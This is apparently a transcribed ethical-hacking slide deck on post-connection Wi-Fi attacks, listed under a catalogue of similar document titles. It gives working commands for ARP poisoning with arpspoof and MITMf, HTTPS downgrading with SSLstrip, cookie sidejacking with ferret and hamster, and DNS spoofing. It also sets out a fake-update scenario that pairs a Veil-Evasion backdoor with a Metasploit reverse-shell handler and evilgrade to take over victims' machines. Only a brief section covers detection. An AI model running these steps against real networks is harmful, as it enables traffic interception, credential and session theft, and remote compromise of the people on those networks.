Post Connection Attacks

Similar documents
Man In The Middle Project completed by: John Ouimet and Kyle Newman

The Anatomy of a Man in the Middle Attack

Man in the middle. Bởi: Hung Tran

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

When does it work? Packet Sniffers. INFO Lecture 8. Content 24/03/2009

ECCouncil Certified Ethical Hacker. Download Full Version :

Defeating All Man-in-the-Middle Attacks

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Network Security. Thierry Sans

Advanced Vmware Security The Lastest Threats and Tools

AN TOÀN LỚP 4: TCP/IP ATTACKS NGUYEN HONG SON PTITHCM

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

Hacking Wireless Networks by data

Curso: Ethical Hacking and Countermeasures

Ethical Hacking as a Professional Penetration Testing Technique ISSA Southern Tier & Rochester Chapters

CIT 380: Securing Computer Systems. Network Security Concepts

SANS SEC504. Hacker Tools, Techniques, Exploits and Incident Handling.

Ethical Hacking and Prevention

Chapter 2. Switch Concepts and Configuration. Part II

SETTING UP THE LAB 1 UNDERSTANDING BASICS OF WI-FI NETWORKS 26

Penetration testing using Kali Linux - Network Discovery

ETHICAL HACKING & COMPUTER FORENSIC SECURITY

Network Security. Dr. Ihsan Ullah. Department of Computer Science & IT University of Balochistan, Quetta Pakistan. June 18, 2015

Contents in Detail. Foreword by Peter Van Eeckhoutte

Evil Twin Wireless Access Point Attack

Project 3: Network Security

Scanning. Introduction to Hacking. Networking Concepts. Windows Hacking. Linux Hacking. Virus and Worms. Foot Printing.

CSC 405 Introduction to Computer Security. Network Security

Telnet Session Hijack

Certified Penetration Testing Consultant

Switched environments security... A fairy tale.

CompTIA Security+ Malware. Threats and Vulnerabilities Vulnerability Management

CEH Tools. Sniffers. - Wireshark: The most popular packet sniffer with cross platform support.

Principles of ICT Systems and Data Security

International Journal of Advance Research in Engineering, Science & Technology

WIRELESS EVIL TWIN ATTACK

CPTE: Certified Penetration Testing Engineer

Internet Layers. Physical Layer. Application. Application. Transport. Transport. Network. Network. Network. Network. Link. Link. Link.

NETWORK INTRUSION. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

Practice Labs Ethical Hacker

CS 161 Computer Security

SPOOFING. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

Sniffing HTTPS Traffic in LAN by Address Resolution Protocol Poisoning

The following virtual machines are required for completion of this lab: Exercise I: Mapping a Network Topology Using

Lab1. Definition of Sniffing: Passive Sniffing: Active Sniffing: How Does ARP Spoofing (Poisoning) Work?

CIS 76 Telnet Session Hijack. Admonition

Port Mirroring in CounterACT. CounterACT Technical Note

Instituto Superior Técnico, Universidade de Lisboa Network and Computer Security. Lab guide: Traffic analysis and TCP/IP Vulnerabilities

Sample Exam Ethical Hacking Foundation

Endpoint Security - what-if analysis 1

Drone /12/2018. Threat Model. Description. Threats. Threat Source Risk Status Date Created

Wireless Network Penetration Testing Using Kali Linux on BeagleBone Black

Int ernet w orking. Internet Security. Literature: Forouzan: TCP/IP Protocol Suite : Ch 28

NETWORK SECURITY. Ch. 3: Network Attacks

Network security - basic attacks

Adopting Innovative Detection Technique To Detect ICMPv6 Based Vulnerability Attacks

Wireless Network Security

Mobile Security Fall 2013

DNS CACHE POISONING LAB

Secure Communications Over a Network

Man-in-the-Middle Laboratory

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

BraindumpsIT. BraindumpsIT - IT Certification Company provides Braindumps pdf!

Francisco Amato evilgrade, "You have pending upgrades..."

::/Topics/Configur...

Security Assessment and Analysis with Penetration Tools and Wireshark. (Final Draft) Ryan A. Drozdowski. Mike Hannaford.

Jackson State University Department of Computer Science CSC 437/539 Computer Security Fall 2013 Instructor: Dr. Natarajan Meghanathan

Example: Configuring DHCP Snooping and DAI to Protect the Switch from ARP Spoofing Attacks

Types of Attacks That Can Be Carried Out on Wireless Networks

PENETRATION TESTING. A HattdA-Oti Introduction. to Hacking. by Georgia Weidman. <e> no starch. press. San Francisco

Assignment 2 TCP/IP Vulnerabilities

Network Security. Evil ICMP, Careless TCP & Boring Security Analyses. Mohamed Sabt Univ Rennes, CNRS, IRISA Thursday, October 4th, 2018

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

ELEC5616 COMPUTER & NETWORK SECURITY

Host Website from Home Anonymously

BackTrack 5 Wireless Penetration Testing

What action do you want to perform by issuing the above command?

Wireless LAN Security (RM12/2002)

IPv6 Traffic Hijack Test System and Defense Tools Using DNSSEC

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

What is Eavedropping?

Worldwide Release. Your world, Secured ND-IM005. Wi-Fi Interception System

3. Apache Server Vulnerability Identification and Analysis

NETGEAR-FVX Relation. Fabrizio Celli;Fabio Papacchini;Andrea Gozzi

9. Wireshark I: Protocol Stack and Ethernet

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

Section 4 Cracking Encryption and Authentication

Ethical Hacking. Content Outline: Session 1

Man-In-The-Browser Attacks. Daniel Tomescu

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Wireless Network Security Spring 2016

Audience. Pre-Requisites

CISNTWK-440. Chapter 4 Network Vulnerabilities and Attacks

Computer Forensics: Investigating Network Intrusions and Cybercrime, 2nd Edition. Chapter 2 Investigating Network Traffic

ARP SPOOFING Attack in Real Time Environment

Transcription:

Post Connection Attacks All the attacks we carried out in the previous sections can be done without knowing the key to the AP, ie: without connecting to the target network. We saw how we can control all the connections around us, gather some information, sniff packets and crack WEP/WPA/WPA2 keys. In this section we shall have a look on more sophisticated attacks that can only be used after connecting to the target AP

Gathering Information In section 1 we saw how we can user airodump-ng to discover all the AP's around us and the clients associated with them. Now that we are connected to a specific AP, we can gather more detailed info about the clients connected to this AP. There is a number of programs that can be used to do this, we shall talk about 3 programs starting with the simplest and quickest one.

Netdiscover Netdiscover is a program that can be used to discover the connected clients to our current network, its very quick but it does not show detailed information about the clients: IP, MAC address and some times the hardware manufacturer for the client's wireless card. Usage: netdiscover -i [INTERFACE] -r [RANGE] ex: netdiscover -i wlan0 -r 192.168.1.1/24

Autoscan Autoscan is another program that can be used to discover the connected clients to our current network, its not as quick as net discover, but it shows more detailed information about the connected devices and it has a graphical user interface. You can download Autoscan from: http://autoscan-network.com/download/ Then open the directory where you extracted it and run./autoscan*.sh

Nmap Namp is a network discovery tool that can be used to gather detailed information about any client or network. We shall have a look on some of its uses to discover connected clients and gather information about them. We are going to use Zenmap the GUI for Nmap. 1. Ping scan: Very quick only shows connected clients. 2.Quick scan plus: Quick shows MAC and open ports. 3.Quick scan plus: Slower then the 2 above, more detailed info. These are just sample scans, you can experiment with the scan options and see the difference between them.

Man In The Middle Attacks ARP Poisoning This is one of the most dangerous and effective attacks that can be used, it is used to redirect packets to and from any client to our device, and since we have the network key, we can read/modify/drop these packets. This allows us to launch very powerful attacks. It is very effective and dangerous because it's very hard to protect against it as it exploits the insecure way that ARP works.

Man In The Middle Attacks ARP Poisoning ARP main security issues: 1. Each ARP request/response is trusted. 2. Clients can accept responses even if they did not send a request. Requ ests Resp on ses

ARP Poisoning We can exploit theses two issues to redirect the flow of packets in the network. We will first send an ARP response to the client telling it that I am the Router, this done by telling the client that the device with the router ip address has MY MAC address. Ip:router ip MAC: HACKER MAC I am the router

ARP Poisoning Then we will send an ARP response to the router this time telling it that I am the client, this done by telling the router that the device with the client ip address has MY MAC address. Ip:client ip MAC: HACKER MAC I am the client

Man In The Middle Attacks ARP Poisoning This means that the router thinks that I am the client, and the client thinks that I am the router. So my device is in the middle of the connection between the client and the router, ie:every packet that is going to/from the client will have to go through my device first. Requests Responses

ARP Poisoning arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device. 1. Tell the target client that I am the router. arpspoof -i [interface] -t [Target IP] [AP IP] Ex: arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1 2. Tell the AP that I am the target client. arpspoof -i [interface] -t [AP IP] [Target IP] Ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5 3. Enable IP forward to allow packets to flow through our device without being dropped. Echo 1 > /proc/sys/net/ipv4/ip_forward

ARP Poisoning - MITMf MITMf is a framework that allows us to launch a number of MITM attacks. MITMf also starts SSLstrip automatically to bypass HTTPS/SSL mitmf arp spoof -gateway [GATEWAY IP] targets [TARGET IPs] Ex: Mitmf arp spoof -gateway 10.20.14.1 targets 10.20.14.206 Echo 1 > /proc/sys/net/ipv4/ip_forward

MITM bypassing HTTPS Most websites use https in their login pages, this means that these pages are validated using an SSL certificate and there for will show a warning to the user that the certificate is invalid. SSLstrip is a tool that can be used to downgrade HTTPS requests to HTTP allowing us to sniff passwords without displaying a warning to the user. Luckily MITMf starts SSLstrip for us automatically.

Session Hijacking What if the user uses the remember me feature?? If the user uses this feature the authentication happens using the cookies and not the user and password. So instead of sniffing the password we can sniff the cookies and inject them into our browser, this will allow us to login to the user's account without using the password. apt-get install ferret-sidejack ferret -i [INTERFACE] hamster

MITM DNS Spoofing DNS Spoofing allows us to redirect any request to a certain domain to another domain, for example we can redirect any request from live.com to a fake page!! 1. Edit dns settings > leafpad /etc/mitmf/mitmf.conf 2. Run ettercap to arp poison the target(s) and enable the dns_spoof plugin. mitmf arp spoof gateway [GATEWAY IP] targets [TARGET IP] -i eth0 --dns Ex: mitmf arp spoof gateway [10.20.14.1] targets [10.20.14.206] -i eth0 --dns

MITM Wireshark Wireshark is a network protocol analyser that is designed to help network administrators to keep track of what is happening in their network and analyse all the packets. Can be used whenever we are the MITM, after ARP spoofing or after starting a fake AP. Wireshark logs each packet that flows through the selected interface. Usage: > wireshark

Protecting against MITM attacks It is very difficult to protect against MITM attacks, this is due to the fact that they exploit the insecure way that ARP works. Using static ARP tables can protect against MITM attacks but its not practical in large networks. Even in small networks you have to configure ARP tables every time a new device connects to your network. We can discover ARP poisoning easily by only looking at our ARP tables. > arp -a If the MAC address of the router changes then we have been poisoned.

Protecting against MITM attacks There is also tools that would monitor our ARP table automatically and would notify us if anything suspicious happens. And we can use wireshark to detect ARP poisoning and other suspicious activities in the network.

Scenario 2 Hacking clients using a fake update 1. Create a backdoor. > apt-get install veil-evasion #to install veil-evasion > veil-evasion > use 8 > set LHOST [YOUR IP] > generate 2. Listen for connections from your backdoor. > msfconsole > use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_http > set LPORT 5555 > set LHOST [YOUR IP] > exploit

Hacking clients using a fake update Using a tool called evil-grade, we can create fake updates and spoof the url that the target program uses to check for updates and get it to redirect to our machine where we have evil grade running, the target program will tell the user that there is a new update available, and when the user agrees to install the new update we will gain full access to their device.

Wi-fEye Wi-fEye is a program written in python, designed to help carry out all the attacks that we explained automatically. 1. download it from. http://wi-feye.isecur1ty.org/download.php Then you need to extract the archive, and run the following command inside its directory: > python install.py Now you are ready to go! > python Wi-fEye.py

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback